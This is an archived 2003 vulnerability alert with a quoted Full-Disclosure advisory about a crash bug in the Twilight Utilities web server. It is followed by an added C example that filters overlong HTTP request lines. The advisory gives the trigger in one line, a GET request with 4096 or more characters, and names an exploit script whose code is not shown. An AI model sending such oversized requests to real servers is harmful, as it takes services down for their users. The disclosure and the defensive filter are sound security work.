Twilight Utilities Web Server Can Be Crashed By Remote Users
SecurityTracker Alert ID: 1006582
CVE Reference: GENERIC-MAP-NOMATCH
Date: Apr 16 2003
Impact: Denial of service via network
Exploit Included: Yes
Description: A vulnerability was reported in the Twilight Utilities Web Server. A remote user can cause the web server to crash.
Security-Protocols Research Labs reported that a remote user can send a specially crafted HTTP GET request to cause the web service to crash. According to the report, a GET / followed by 4096 characters can trigger the flaw.
A demonstration exploit script is provided in the Source Message.
Impact: A remote user can cause the web service to crash.
Solution: No solution was available at the time of this entry.
Vendor URL: www.twilightutilities.com/WebServer.html
Cause: Boundary error
Underlying OS: Windows (Any)
Reported By: "badpack3t" <badpack3t@security-protocols.com>
Message History: This archive entry has one or more follow-up message(s) listed below.
Source Message Contents
Date: Tue, 15 Apr 2003 21:20:37 -0400 (EDT)
From: "badpack3t" <badpack3t@security-protocols.com>
Subject: [Full-Disclosure] Twilight Utilities TW-WebServer/1, 3, 2, 0 DoS
SP Research Labs Advisory x02
-----------------------------
www.security-protocols.com
Product - Twilight Utilities TW-WebServer/1,3,2,0
Download it here:
http://www.twilightutilities.com/WebServer.html
Date Released - 04/15/2003
Release Mode - 0hday, why contact the vendor?
Advisory Link:
http://www.security-protocols.com/article.php?sid=1474&mode=thread&order=0
----------------------------
Product Description from the vendor -
We are excited to present this completely new Modem Ready Internet Web
Server supporting these terrific features.
-Installs in seconds
-Lets you INSTANTLY share pictures and files
-Modem aware
-Automates telling friends and family when you start serving
-Automatically integrates your web camera
-Allows others to send files to you
-Automatically generates web pages
-Supports file resume
-A truly unique files-sharing tool
-----------------------------
Vulnerability Description -
To exploit this vulnerability, simply do a GET / with 4096 A's or more, which will cause the webserver to go down. Who really gives a damn, right?
Tested on:
Windows XP Pro SP1
Windows 2000 SP3
-----------------------------
Credit –
2PAC and Snoop Dogg did most of the work on this one.
-----------------------------
peace out,
badpack3t
www.security-protocols.com
Attachment: sp-urfuqed.pl (application/x-perl)
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
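The entry above lists the cause as a boundary error reached by a GET request line of 4096 or more characters, with no vendor fix available. The following is an added example, not code from the advisory, SecurityTracker or the vendor: a bounded request-line check of the kind a filter in front of such a server could apply. The function name, the 2048-byte cap and the status mapping are assumptions.

```c
#include <stddef.h>
#include <string.h>

/* Assumed cap, chosen well below the 4096 characters named in the advisory. */
#define MAX_REQUEST_LINE 2048

enum verdict { REQ_NEED_MORE = 0, REQ_OK = 200, REQ_BAD = 400,
               REQ_URI_TOO_LONG = 414 };

/*
 * Inspect the bytes received so far (buf need not be NUL-terminated) and
 * decide whether the request line may be passed on to the backend.
 * On REQ_OK the request target is copied, NUL-terminated, into uri,
 * which has room for uri_cap bytes.
 */
enum verdict check_request_line(const char *buf, size_t len,
                                char *uri, size_t uri_cap)
{
    /* Search for the end of the line only inside the cap. */
    size_t scan = len < MAX_REQUEST_LINE ? len : MAX_REQUEST_LINE;
    const char *eol = memchr(buf, '\n', scan);
    if (eol == NULL)   /* over the cap: reject; under it: keep reading */
        return len >= MAX_REQUEST_LINE ? REQ_URI_TOO_LONG : REQ_NEED_MORE;

    size_t line_len = (size_t)(eol - buf);
    if (line_len > 0 && buf[line_len - 1] == '\r')
        line_len--;

    /* Expected shape: METHOD SP request-target SP HTTP-version */
    const char *sp1 = memchr(buf, ' ', line_len);
    if (sp1 == NULL || sp1 == buf)
        return REQ_BAD;
    const char *target = sp1 + 1;
    size_t rest = line_len - (size_t)(target - buf);
    const char *sp2 = memchr(target, ' ', rest);
    if (sp2 == NULL || sp2 == target)
        return REQ_BAD;

    /* Every copy is checked against the destination size first. */
    size_t target_len = (size_t)(sp2 - target);
    if (target_len >= uri_cap)          /* keep room for the terminator */
        return REQ_URI_TOO_LONG;
    memcpy(uri, target, target_len);
    uri[target_len] = '\0';
    return REQ_OK;
}
```

Requests that return anything other than `REQ_OK` or `REQ_NEED_MORE` are answered by the filter itself and never reach the backend's parser.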